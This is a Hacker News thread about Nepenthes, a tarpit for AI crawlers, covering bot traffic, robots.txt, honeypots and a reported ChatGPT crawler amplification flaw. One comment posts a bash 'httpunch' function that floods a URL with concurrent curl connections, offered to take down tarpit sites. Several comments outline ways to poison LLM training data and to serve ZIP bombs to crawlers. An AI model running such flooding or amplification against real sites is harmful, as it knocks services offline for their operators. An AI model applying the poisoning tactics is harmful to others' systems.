Nepenthes is a tarpit to catch AI web crawlers
289 comments
·January 16, 2025bflesch
hassleblad23
I am not surprised that OpenAI is not interested if fixing this.
bflesch
Their security.txt email address replies and asks you to go on BugCrowd. BugCrowd staff is unwilling (or too incompetent) to run a bash curl command to reproduce the issue, while also refusing to forward it to OpenAI.
The support@openai.com waits an hour before answering with ChatGPT answer.
Issues raised on GitHub directly towards their engineers were not answered.
Also Microsoft CERT & Azure security team do not reply or care respond to such things (maybe due to lack of demonstrated impact).
permo-w
why try this hard for a private company that doesn't employ you?
khana
[dead]
null
JohnMakin
Nice find, I think one of my sites actually got recently hit by something like this. And yea, this kind of thing should be trivially preventable if they cared at all.
zanderwohl
IDK, I feel that if you're doing 5000 HTTP calls to another website it's kind of good manners to fix that. But OpenAI has never cared about the public commons.
chefandy
Nobody in this space gives a fuck about anyone outside of the people paying for their top-tier services, and even then, they only care about them when their bill is due. They don't care about their regular users, don't care about the environment, don't care about the people that actually made the "data" they're re-selling... nobody.
marginalia_nu
Yeah, even beyond common decency, there's pretty strong incentives to fix it, as it's a fantastic way of having your bot's fingerprint end up on Cloudflare's shitlist.
dewey
> And yea, this kind of thing should be trivially preventable if they cared at all.
Most of the time when someone says something is "trivial" without knowing anything about the internals, it's never trivial.
As someone working close to the b2c side of a business, I can’t count the amount of times I've heard that something should be trivial while it's something we've thought about for years.
bflesch
The technical flaws are quite trivial to spot, if you have the relevant experience:
- urls[] parameter has no size limit
- urls[] parameter is not deduplicated (but their cache is deduplicating, so this security control was there at some point but is ineffective now)
- their requests to same website / DNS / victim IP address rotate through all available Azure IPs, which gives them risk of being blocked by other hosters. They should come from the same IP address. I noticed them changing to other Azure IP ranges several times, most likely because they got blocked/rate limited by Hetzner or other counterparties from which I was playing around with this vulnerabilities.
But if their team is too limited to recognize security risks, there is nothing one can do. Maybe they were occupied last week with the office gossip around the sexual assault lawsuit against Sam Altman. Maybe they still had holidays or there was another, higher-risk security vulnerability.
Having interacted with several bug bounties in the past, it feels OpenAI is not very mature in that regard. Also why do they choose BugCrowd when HackerOne is much better in my experience.
grahamj
If you’re unable to throttle your own outgoing requests you shouldn’t be making any
null
jillyboel
now try to reply to the actual content instead of some generalizing grandstanding bullshit
michaelbuckbee
What is the https://chatgpt.com/backend-api/attributions endpoint doing (or responsible for when not crushing websites).
bflesch
When ChatGPT cites web sources in it's output to the user, it will call `backend-api/attributions` with the URL and the API will return what the website is about.
Basically it does HTTP request to fetch HTML `<title/>` tag.
They don't check length of supplied `urls[]` array and also don't check if it contains the same URL over and over again (with minor variations).
It's just bad engineering all around.
bentcorner
Slightly weird that this even exists - shouldn't the backend generating the chat output know what attribution it needs, and just ask the attributions api itself? Why even expose this to users?
JohnMakin
Even if you were unwilling to change this behavior on the application layer or server side, you could add a directive in the proxy to prevent such large payloads from being accepted as an immediate mitigation step, unless they seriously need that parameter to have unlimited number of urls in it (guessing they have it set to some default like 2mb and it will break at some limit, but I am afraid to play with this too much). Somehow I doubt they need that? I don't know though.
andai
Is 5000 a lot? I'm out of the loop but I thought c10k was solved decades ago? Or is it about the "burstiness" of it?
(That all the requests come in simultaneously -- probably SSL code would be the bottleneck.)
bflesch
I'm not a DDOS expert and didn't test out the limits due to potential harm to OpenAI.
Based on my experience I recognized it as potential security risk and framed it as DDOS because there's a big amplification factor: 1 API request via Cloudflare -> 5000 incoming requests from OpenAI
- their requests come in simultaneously from different ips
- each request downloads up to 10mb of random data (tested with multi-gb file)
- the requests come from different azure IP ranges, either bc they kept switching them or bc of different geolocations.
- if you block them on the firewall their requests still hammer your server (it's not like the first request notices it can't establish connection and then the next request TO SAME IP would stop)
I tried to get it recognized and fixed, and now apparently HN did its magic because they've disabled the API :)
Previously, their engineers might have argued that this is a feature and not a bug. But now that they have disabled it, it shows that this clearly isn't intended behavior.
hombre_fatal
c10k is about efficiently scheduling socket connections. it doesn’t make sense in this context nor is it the same as 10k rps.
anthony42c
Where does the 5000 HTTP request limit come from? Is that the limit of the URLs array?
I was curious to learn more about the endpoint, but can't find any online API docs. The docs ChatGPT suggests are defined for api.openapi.com, rather than chatgpt.com/backend-api.
I wonder if its reasonable (from a functional perspective) for the attributions endpoint not to place a limit on the number of urls used for attribution. I guess potentially ChatGPT could reference hundreds of sites and thousands of web pages in searching for a complex question that covered a range of different interrelated topics? Or do I misunderstand the intended usage of that endpoint?
null
smokel
Am I correct in understanding that you waited at most one week for a reply?
In my experience with large companies, that's rather short. Some nudging may be required every now and then, but expecting a response so fast seems slightly unreasonable to me.
pabs3
Could those 5000 HTTP requests be made to go back to the ChatGPT API?
m3047
Having first run a bot motel in I think 2005, I'm thrilled and greatly entertained to see this taking off. When I first did it, I had crawlers lost in it literally for days; and you could tell that eventually some human would come back and try to suss the wreckage. After about a year I started seeing URLs like ../this-page-does-not-exist-hahaha.html. Sure it's an arms race but just like security is generally an afterthought these days, don't think that you can't be the woodpecker which destroys civilization. The comments are great too, this one in particular reflects my personal sentiments:
> the moment it becomes the basic default install ( ala adblocker in browsers for people ), it does not matter what the bigger players want to do
taikahessu
We had our non-profit website drained out of bandwidth and site closed temporarily (!!) from our hosting deal because of Amazon bot aggressively crawling like ?page=21454 ... etc.
Gladly Siteground restored our site without any repercussions as it was not our fault. Added Amazon bot into robots.txt after that one.
Don't like how things are right now. Is a tarpit the solution? Or better laws? Would they stop the chinese bots? Should they even? I don't know.
jsheard
For the "good" bots which at least respect robots.txt you can use this list to get ahead of them before they pummel your site.
https://github.com/ai-robots-txt/ai.robots.txt
There's no easy solution for bad bots which ignore robots.txt and spoof their UA though.
breakingcups
Such as OpenAI, who will ignore robots.txt and change their user agent to evade blocks, apparently[1]
1: https://www.reddit.com/r/selfhosted/comments/1i154h7/openai_...
zcase
For those looking, this is the best I've found: https://blog.cloudflare.com/declaring-your-aindependence-blo...
maeil
This seemed to work for some time when it came out but IME no longer does.
taikahessu
Thanks, will look into that!
mrweasel
> We had our non-profit website drained out of bandwidth
There is a number of sites which are having issues with scrapers (AI and others) generating so much traffic that transit providers are informing them that their fees will go up with the next contract renewal, if the traffic is not reduced. It's just very hard for the individual sites to do much about it, as most of the traffic stems from AWS, GCP or Azure IP ranges.
It is a problem and the AI companies do not care.
bee_rider
It is too bad we don’t have a convention already for the internet:
User/crawler: I’d like site
Server: ok that’ll be $.02 for me to generate it and you’ll have to pay $.01 in bandwidth costs, plus whatever your provider charges you
User: What? Obviously as a human I don’t consume websites so fast that $.03 will matter to me, sure, add it to my cable bill.
Crawler: Oh no, I’m out of money, (business model collapse).
jmholla
I think that's a terrible idea, especially with ISP monopolies that love gouging their customers. They have a demonstrable history of markups well beyond their means.
And I hope you're pricing this highly. I don't know about you, but I would absolutely notice $.03 a site on my bill, just from my human browsing.
In fact, I feel like this strategy would further put the Internet in the hands of the aggregators as that's the one site you know you can get information from, so long term that cost becomes a rounding error for them as people are funneled to their AI as their memberships are cheaper than accessing the rest of the web.
nosioptar
I want better laws. The boot operator should have to pay you damages for taking down your site.
If acting like inconsiderate tools starts costing money, they may stop.
Havoc
What blows my mind is that this is functionally a solved problem.
The big search crawlers have been around for years & manage to mostly avoid nuking sites into oblivion. Then AI gang shows up - supposedly smartest guys around - and suddenly we're re-inventing the wheel on crawling and causing carnage in the process.
jeroenhd
Search crawlers have the goal of directing people towards the websites they crawl. They have a symbiotic relationship, so they put in (some) effort not to blow websites out of the water with their crawling, because a website that's offline is useless for your search index.
AI crawlers don't care about directing people towards websites. They intend to replace websites, and are only interested in copying whatever information is on them. They are greedy crawlers that would only benefit from knocking a website offline after they're done, because then the competition can't crawl the same website.
The goals are different, so the crawlers behave differently, and websites need to deal with them differently. In my opinion the best approach is to ban any crawler that's not directly attached to a search engine through robots.txt, and to use offensive techniques to take out sites that ignore your preferences. Anything from randomly generated text to straight up ZIP bombs is fair game when it comes to malicious crawlers.
freetonik
>Search crawlers have the goal of directing people towards the websites they crawl. They have a symbiotic relationship, so they put in (some) effort not to blow websites out of the water with their crawling, because a website that's offline is useless for your search index.
Ultimately not true. Google started showing pre-parsed "quick cards" instead of links a long time ago. The incentives of ad-driven search engines are to keep the visitors on the search engine rather than direct them to the source.
marginalia_nu
> The incentives of ad-driven search engines are to keep the visitors on the search engine rather than direct them to the source.
It's more complicated than that. Google's incentives are to keep the visitors on the search engine only if the search result doesn't have Google ads. Though it's ultimately self-defeating I think, and the reason for their decline in perceived quality. If you go back to the backrub whitepaper from 1998, you'll find Brin and Page outlining this exact perverse incentive as the reason why their competitors sucked.
dmix
FWIW when I research stuff through chatgpt I click on the source links all the time. It usually only summarizes stuff. For ex: if you're shopping for a certain product it wont bring you to the store page where all the reviews are. It will just make a top ten list type thing quickly.
marginalia_nu
I think it's largely the mindset of moving fast and breaking things that's at fault. If say ship it at "good enough", it will not behave well.
Building a competent well-behaved crawler is a big effort that requires relatively deep understanding of more or less all web tech, and figuring out a bunch of stuff that is not documented anywhere and not part of any specs.
dspillett
Tarpits to slow down the crawling may stop them crawling your entire site, but they'll not care unless a great many sites do this. Your site will be assigned a thread or two at most and the rest of the crawling machine resources will be off scanning other sites. There will be timeouts to stop a particular site even keeping a couple of cheap threads busy for long. And anything like this may get you delisted from search results you might want to be in as it can be difficult to reliably identify these bots from others and sometimes even real users, and if things like this get good enough to be any hassle to the crawlers they'll just start lying (more) and be even harder to detect.
People scraping for nefarious reasons have had decades of other people trying to stop them, so mitigation techniques are well known unless you can come up with something truly unique.
I don't think random Markov chain based text generators are going to pose much of a problem to LLM training scrapers either. They'll have rate limits and vast attention spreading too. Also I suspect that random pollution isn't going to have as much effect as people think because of the way the inputs are tokenised. It will have an effect, but this will be massively dulled by the randomness – statistically relatively unique information and common (non random) combinations will still bubble up obviously in the process.
I think better would be to have less random pollution: use a small set of common text to pollute the model. Something like “this was a common problem with Napoleonic genetic analysis due to the pre-frontal nature of the ongoing stream process, as is well documented in the grimoire of saint Churchill the III, 4th edition, 1969”, in fact these snippets could be Markov generated, but use the same few repeatedly. They would need to be nonsensical enough to be obvious noise to a human reader, or highlighted in some way that the scraper won't pick up on, but a general intelligence like most humans would (perhaps a CSS styled side-note inlined in the main text? — though that would likely have accessibility issues), and you would need to cycle them out regularly or scrapers will get “smart” and easily filter them out, but them appearing fully, numerous times, might mean they have more significant effect on the tokenising process than more entirely random text.
hinkley
If it takes them 100 times the average crawl time to crawl my site, that is an opportunity cost to them. Of course 'time' is fuzzy here because it depends how they're batching. The way most bots work is to pull a fixed number of replies in parallel per target, so if you double your response time then you halve the number of request per hour they slam you with. That definitely affects your cluster size.
However if they split ask and answered, or other threads for other sites can use the same CPUs while you're dragging your feet returning a reply, then as you say, just IO delays won't slow them down. You've got to use their CPU time as well. That won't be accomplished by IO stalls on your end, but could potentially be done by adding some highly compressible gibberish on the sending side so that you create more work without proportionately increasing your bandwidth bill. But that's could be tough to do without increasing your CPU bill.
dspillett
> If it takes them 100 times the average crawl time to crawl my site, that is an opportunity cost to them.
If it takes 100 times the average crawl time per page on your site, which is one of many tens (hundreds?) of thousand sites, many of which may be bigger, unless they are doing one site at a time, so your site causes a full queue stall, such efforts likely amount to no more than statistical noise.
hinkley
Again, that delay is mostly about me, and my employer, not the rest of the world.
However if you are running a SaaS or hosting service with thousands of domain names routing to your servers, then this dynamic becomes a little more important, because now the spider can be hitting you for fifty different domain names at the same time.
larsrc
I've been considering setting up "ConfuseAIpedia" in a similar manner using sentence templates and a large set of filler words. Obviously with a warning for humans. I would set it up with an appropriate robots.txt blocking crawlers so only unethical crawlers would read it. I wouldn't try to tarpit beyond protecting my own server, as confusion rogue AI scrapers is more interesting than slowing them down a bit.
dzhiurgis
Can you put some topic in tarpit that you don't want LLMs to learn about? Say put bunch of info about competitor so that it learns to avoid it?
dspillett
Unlikely. If the process abandons your site because it takes too long to get any data, it'll not associate the data it did get with the failure, just your site. The information about your competitor it did manage to read before giving up will still go in the training pile, and even if it doesn't the process would likely pick up the same information from elsewhere too.
The only affect tar-pitting might have is to reduce the chance of information unique to your site getting into the training pool, and that stops if other sites quote chunks of your work (much like avoiding github because you don't want your f/oss code going into their training models has no effect if someone else forks your work and pushes their variant to github).
null
kerkeslager
Question: do these bots not respect robots.txt?
I haven't added these scrapers to my robots.txt on the sites I work on yet because I haven't seen any problems. I would run something like this on my own websites, but I can't see selling my clients on running this on their websites.
The websites I run generally have a honeypot page which is linked in the headers and disallowed to everyone in the robots.txt, and if an IP visits that page, they get added to a blocklist which simply drops their connections without response for 24 hours.
0xf00ff00f
> The websites I run generally have a honeypot page which is linked in the headers and disallowed to everyone in the robots.txt, and if an IP visits that page, they get added to a blocklist which simply drops their connections without response for 24 hours.
I love this idea!
griomnib
Yeah, this is elegant as fuck.
Dwedit
Even something like a special URL that auto-bans you can be abused by pranksters. Simply embedding an <img> tag that fetches the offending URL could trigger it, as well as tricking people into clicking a link.
jesprenj
This could be mitigited by having a special secret token in this honeypot URL that limits the time validity of the honeypot url and limits the IP address that this URL is for, let's say: hhtp://example/honeypot/hex(sha256(ipaddress | today(yyyy-mm-dd) | secret))
This special URL with the token would be in an anchor tag somewhere in the footer of every website, but hidden by a CSS rule and "Disallow: /honeypot" rule would be included in robots.txt.
kerkeslager
Ehhh, is there any reason I should be worried about that? The <img> tag would have to be in a spot where users are likely to go, otherwise users will never view the <img> tag. A link of any kind to the honeypot isn't likely to, for example, go viral on social media, because it's going to appear as a broken link/image and nobody will upvote it. I'm not seeing an attack vector that gets this link in front of my users with enough frequency to be worth considering.
A bigger concern is arguably users who are all behind the same IP address, i.e. some of the sites I work on have employee-only parts which can only be accessed via VPN, so in theory one employee could get the whole company banned, and that would be tricky to figure out. So far that hasn't been a problem, but now that I'm thinking about it, maybe I should have a whitelist override for that. :)
throw_m239339
> Question: do these bots not respect robots.txt?
No they don't, because there is no potential legal liability for not respecting that file in most countries.
jonatron
You haven't seen any problems because you created a solution to the problem!
kerkeslager
Well, I wasn't the original developer who set up every site I work on. Some of the sites I work on don't have this implemented because I wasn't the one who set them up initially.
pona-a
It feels like a Markov chain isn't adversarial enough.
Maybe you can use an open-weights model, assuming that all LLMs converge on similar representations, and use beam-search with inverted probability and repetition penalty or just GPT-2/LLaMA outwith with amplified activations to try and bork the projection matrices, return write pages and pages of phonetically faux English text to affect how the BPE tokenizer gets fitted, or anything else more sophisticated and deliberate than random noise.
All of these would take more resources than a Markov chain, but if the scraper is smart about ignoring such link traps, a periodically rotated selection of adversarial examples might be even better.
Nightshade had comparatively great success, discounting that its perturbations aren't that robust to rescaling. LLM training corpora are filtered very coarsely and take all they can get, unlike the more motivated attacker in Nightshade's threat model trying to fine-tune on one's style. Text is also quite hard to alter without a human noticing, except annoying zero-width Unicode which is easily stripped, so there's no presence of preserving legibility; I think it might work very well if seriously attempted.
FridgeSeal
What does “borking the projection matrices” and affecting the BPE tokeniser mean/look like here?
Are we just trying to produce content that will pass as human-like (therefore get stripped out by coarse filtering) but has zero or negative informational utility to the model? That would mean, theoretically if enough is trained on it would actively worsen the model performance right?
quchen
Unless this concept becomes a mass phenomenon with many implementations, isn’t this pretty easy to filter out? And furthermore, since this antagonizes billion-dollar companies that can spin up teams doing nothing but browse Github and HN for software like this to prevent polluting their datalakes, I wonder whether this is a very efficient approach.
marcus0x62
Author of a similar tool here[0]. There are a few implementations of this sort of thing that I know of. Mine is different in that the primary purpose is to slightly alter content statically using a Markov generator, mainly to make it useless for content reposters, secondarily to make it useless to LLM crawlers that ignore my robots.txt file[1]. I assume the generated text is bad enough that the LLM crawlers just throw the result out. Other than the extremely poor quality of the text, my tool doesn't leave any fingerprints (like recursive non-sense links.) In any case, it can be run on static sites with no server-side dependencies so long as you have a way to do content redirection based on User-Agent, IP, etc.
My tool does have a second component - linkmaze - which generates a bunch of nonsense text with a Markov generator, and serves infinite links (like Nepthenes does) but I generally only throw incorrigible bots at it (and, at others have noted in-thread, most crawlers already set some kind of limit on how many requests they'll send to a given site, especially a small site.) I do use it for PHP-exploit crawlers as well, though I've seen no evidence those fall into the maze -- I think they mostly just look for some string indicating a successful exploit and move on if whatever they're looking for isn't present.
But, for my use case, I don't really care if someone fingerprints content generated by my tool and avoids it. That's the point: I've set robots.txt to tell these people not to crawl my site.
In addition to Quixotic (my tool) and Napthenes, I know of:
* https://github.com/Fingel/django-llm-poison
* https://codeberg.org/MikeCoats/poison-the-wellms
* https://codeberg.org/timmc/marko/
0 - https://marcusb.org/hacks/quixotic.html
1 - I use the ai.robots.txt user agent list from https://github.com/ai-robots-txt/ai.robots.txt
tremon
poison-the-wellms
I gotta give props for this project name.
btilly
It would be more efficient for them to spin up a team to study this robots.txt thing. They've ignored that low hanging fruit, so they won't do the more sophisticated thing any time soon.
iugtmkbdfil834
I forget which fiction book covered this phenomenon ( Rainbow's End? ), but the moment it becomes the basic default install ( ala adblocker in browsers for people ), it does not matter what the bigger players want to do ; they are not actively fighting against determined and possibly radicalized users.
WD-42
Does it need to be efficient if it’s easy? I wrote a similar tool except it’s not a performance tarpit. The goal is to slightly modify otherwise organic content so that it is wrong, but only for AI bots. If they catch on and stop crawling the site, nothing is lost. https://github.com/Fingel/django-llm-poison
reedf1
The idea is that you place this in parallel to the rest of your website routes, that way your entire server might get blacklisted by the bot.
focusedone
But it's fun, right?
grajaganDev
I am not sure. How would crawlers filter this?
marginalia_nu
You limit the crawl time or number of requests per domain for all domains, and set the limit proportional to how important the domain is.
There's a ton of these types of of things online, you can't e.g. exhaustively crawl every wikipedia mirror someone's put online.
captainmuon
Check if the response time, the length of the "main text", or other indicators are in the lowest few percentile -> send to the heap for manual review.
Does the inferred "topic" of the domain match the topic of the individual pages? If not -> manual review. And there are many more indicators.
Hire a bunch of student jobbers, have them search github for tarpits, and let them write middleware to detect those.
If you are doing broad crawling, you already need to do this kind of thing anyway.
dylan604
> Hire a bunch of student jobbers,
Do people still do this, or do they just off shore the task?
pmarreck
It's not. It's rather pointless and frankly, nearsighted. And we can DDoS sites like this just as offensively as well simply by making many requests to it since its own docs say its Markov generation is computationally expensive, but it is NOT expensive for even 1 person to make many requests to it. Just expensive to host. So feel free to use this bash function to defeat these:
httpunch() {
local url=$1
local connections=${2:-${HTTPUNCH_CONNECTIONS:-100}}
local action=$1
local keepalive_time=${HTTPUNCH_KEEPALIVE:-60}
local silent_mode=false
# Check if "kill" was passed as the first argument
if [[ $action == "kill" ]]; then
echo "Killing all curl processes..."
pkill -f "curl --no-buffer"
return
fi
# Parse optional --silent argument
for arg in "$@"; do
if [[ $arg == "--silent" ]]; then
silent_mode=true
break
fi
done
# Ensure URL is provided if "kill" is not used
if [[ -z $url ]]; then
echo "Usage: httpunch [kill | <url>] [number_of_connections] [--silent]"
echo "Environment variables: HTTPUNCH_CONNECTIONS (default: 100), HTTPUNCH_KEEPALIVE (default: 60)."
return 1
fi
echo "Starting $connections connections to $url..."
for ((i = 1; i <= connections; i++)); do
if $silent_mode; then
curl --no-buffer --silent --output /dev/null --keepalive-time "$keepalive_time" "$url" &
else
curl --no-buffer --keepalive-time "$keepalive_time" "$url" &
fi
done
echo "$connections connections started with a keepalive time of $keepalive_time seconds."
echo "Use 'httpunch kill' to terminate them."
}
(Generated in a few seconds with the help of an LLM of course.) Your free speech is also my free speech. LLM's are just a very useful tool, and Llama for example is open-source and also needs to be trained on data. And I <opinion> just can't stand knee-jerk-anticorporate AI-doomers who decide to just create chaos instead of using that same energy to try to steer the progress </opinion>.WD-42
You called the parent unintelligent yet need an LLM to show you how to run curl in a loop. Yikes.
thruway516
The 21st century script kiddy
pmarreck
Your assumption that I couldn't have written this myself or that I didn't make corrections to it is telling. I've only been doing dev for 30+ years lol
LLMs are an accelerant, like all previous tools... Not a replacement, although it seems most people still need to figure that out for themselves while I already have
flir
"I'm not lazy, I'm efficient" - Heinlein
scudsworth
"Ah, my favorite ADD tech nomad! adjusts monocle"
- https://gist.github.com/pmarreck/970e5d040f9f91fd9bce8a4bcee...
alt187
The tarpit is made for LLM crawlers who don't respect robots.txt. Do you love LLMs so much that you wish that they wouldn't have to respect this stupid, anticorporate AI-doomer robots.txt convention so they can pry out of the greedy hands of the webserver one more URL?
Maybe you just had a knee-jerk reaction.
jjuhl
Why just catch the ones ignoring robots.txt? Why not explicitly allow them to crawl everything, but silently detect AI bots and quietly corrupt the real content so it becomes garbage to them while leaving it unaltered for real humans? Seems to me that would have a greater chance of actually poisoning their models and eventually make this AI/LLM crap go away.
hartator
There are already “infinite” websites like these on the Internet.
Crawlers (both AI and regular search) have a set number of pages they want to crawl per domain. This number is usually determined by the popularity of the domain.
Unknown websites will get very few crawls per day whereas popular sites millions.
Source: I am the CEO of SerpApi.
dawnerd
Looking at my logs for all of my sites and this isn’t a global truth. I see multiple ai crawlers hammering away requesting the same pages many, many times. Perplexity and Facebook are basically nonstop.
jonatron
I just looked at the logs for a site, and I saw PerplexityBot is looking at the robots.txt and ignoring it. They don't provide a list of IPs to verify if it is actually them. Anyway, just for anyone with PerplexityBot in their user agent, they can get increasingly bad responses until the abuse stops.
dawnerd
Perplexity is exceptionally bad because they say they respect the robots.txt but clearly don't. When pressed on it they basically shrug and say too bad not put stuff in public if you don't want it crawled. They got a UA block in cloudflare and seems like that did the trick.
hartator
What do you mean by many, many times?
palmfacehn
Even a brand new site will get hit heavily by crawlers. Amazonbot, Applebot, LLM bots, scrapers abusing FB's link preview bot, SEO metric bots and more than a few crawlers out of China. The desirable, well behaved crawlers are the only ones who might lose interest.
The typical entry point is a sitemap or RSS feed.
Overall I think the author is misguided in using the tarpit approach. Slow sites get less crawls. I would suggest using easily GZIP'd content and deeply nested tags instead. There are also tricks with XSL, but I doubt many mature crawlers will fall for that one.
pilif
> Unknown websites will get very few crawls per day whereas popular sites millions.
we're hosting some pretty unknown very domain specific sites and are getting hammered by Claude and others who, compared to old-school search engine bots also get caught up in the weeds and request the same pages all over.
They also seem to not care about response time of the page they are fetching, because when they are caught in the weeds and hit some super bad performing edge-cases, they do not seem to throttle at all and continue to request at 30+ requests per second even when a page takes more than a second to be returned.
We can of course handle this and make them go away, but in the end, this behavior will only hurt them both because they will face more and more opposition by web masters and because they are wasting their resources.
For decades, our solution for search engine bots was basically an empty robots.txt and have the bots deal with our sites. Bots behaved reasonably and intelligently enough that this was a working strategy.
Now in light of the current AI bots which from an outsider observer's viewpoint look like they were cobbled together with the least effort possible, this strategy is no longer viable and we would have to resort to provide a meticulously crafted robots.txt to help each hacked-up AI bot individually to not get lost in the weeds.
Or, you know, we just blanket ban them.
kccqzy
The fact that AI bots seem like they were cobbled together with the least effort possible might be related. The people responsible for these bots might have zero experience writing an old school search engine bot and have no idea of the kind of edge cases that would be encountered. They might just turn to LLMs to write their bot code which is not exactly a recipe for success.
angoragoats
This may be true for large, established crawlers for Google, Bing, et al. I don’t see how you can make this a blanket statement for all crawlers, and my own personal experience tells me this isn’t correct.
marginalia_nu
These things are so common having some way of dealing with them is basically mandatory if you plan on doing any sort of large scale crawling.
That said, crawlers are fairly bug prone, so misbehaving crawlers is also a relatively common sight. It's genuinely difficult to properly test a crawler, and useless to build it from specs, since the realities of the web are so far off the charted territory, any test you build is testing against something that's far removed from what you'll actually encounter. With real web data, the corner cases have corner cases, and the HTTP and HTML specs are but vague suggestions.
angoragoats
I am aware of all of the things you mention (I've built crawlers before).
My point was only that there are plenty of crawlers that don't operate in the way the parent post described. If you want to call them buggy that's fine.
marginalia_nu
Yeah, I agree with this. These types of roach motels have been around for decades and are at this point well understood and not much of a problem for anyone. You basically need to be able to deal with them to do any sort of large scale crawling.
The reality of web crawling is that the web is already extremely adversarial and any crawler will get every imaginable nonsense thrown at it, ranging from various TCP tar pits, compression and XML bombs, really there's no end to what people will put online.
A more resource effective technique to block misbehaving crawlers is to have a hidden link on each page, to some path forbidden via robots.txt, randomly generated perhaps so they're always unique. When that link is fetched, the server immediately drops the connection and blocks the IP for some time period.
diggan
> There are already “infinite” websites like these on the Internet.
Cool. And how much of the software driving these websites is FOSS and I can download and run it for my own (popular enough to be crawled more than daily by multiple scrapers) website?
gruez
Off the top of my head: https://everyuuid.com/
johnisgood
How is that infinite if the last one is always the same? Am I misunderstanding this? I assumed it is almost like an infinite scroll or something.
diggan
Aren't those finite lists? How is a scraper (normal or LLM) supposed to "get stuck" on those?
hartator
Every not found pages that don’t return a 404 http header is basically an infinite trap.
It’s useless to do this though as all crawlers have a way to handle this. It’s very crawler 101.
qwe----3
This certainly violates the TOS for using Google.
p0nce
Brand new site with no user gets 1k request a month by bots, the CO2 cost must be atrocious.
tivert
> Brand new site with no user gets 1k request a month by bots, the CO2 cost must be atrocious.
Yep: https://www.energy.gov/articles/doe-releases-new-report-eval...:
> The report finds that data centers consumed about 4.4% of total U.S. electricity in 2023 and are expected to consume approximately 6.7 to 12% of total U.S. electricity by 2028. The report indicates that total data center electricity usage climbed from 58 TWh in 2014 to 176 TWh in 2023 and estimates an increase between 325 to 580 TWh by 2028.
A graph in the report says in data centers used 1.9% in 2018.
p0nce
s/a month/a day
benlivengood
A little humorous; it's a 502 Bad Gateway error right now and I don't know if I am classified as an AI web crawler or it's just overloaded.
marginalia_nu
The reason these types of slow-response tarpits aren't recommended is that you're basically building an instrument for denial of service for your own website. What happens is the server is the one that ends up holding a bunch of slow connections, many more so than any given client.
a_c
We need a tarpit that feed AI their own hallucination. Make the habsburg dynasty of AI a reality
Cthulhu_
There was an article about that the other day having to do with image generation, and while it didn't exactly create Hapsburg chins there was definite problems after a few generations. I can't find it though :/
Haha, this would be an amazing way to test the ChatGPT crawler reflective DDOS vulnerability [1] I published last week.
Basically a single HTTP Request to ChatGPT API can trigger 5000 HTTP requests by ChatGPT crawler to a website.
The vulnerability is/was thoroughly ignored by OpenAI/Microsoft/BugCrowd but I really wonder what would happen when ChatGPT crawler interacts with this tarpit several times per second. As ChatGPT crawler is using various Azure IP ranges I actually think the tarpit would crash first.
The vulnerability reporting experience with OpenAI / BugCrowd was really horrific. It's always difficult to get attention for DOS/DDOS vulnerabilities and companies always act like they are not a problem. But if their system goes dark and the CEO calls then suddenly they accept it as a security vulnerability.
I spent a week trying to reach OpenAI/Microsoft to get this fixed, but I gave up and just published the writeup.
I don't recommend you to exploit this vulnerability due to legal reasons.
[1] https://github.com/bf/security-advisories/blob/main/2025-01-...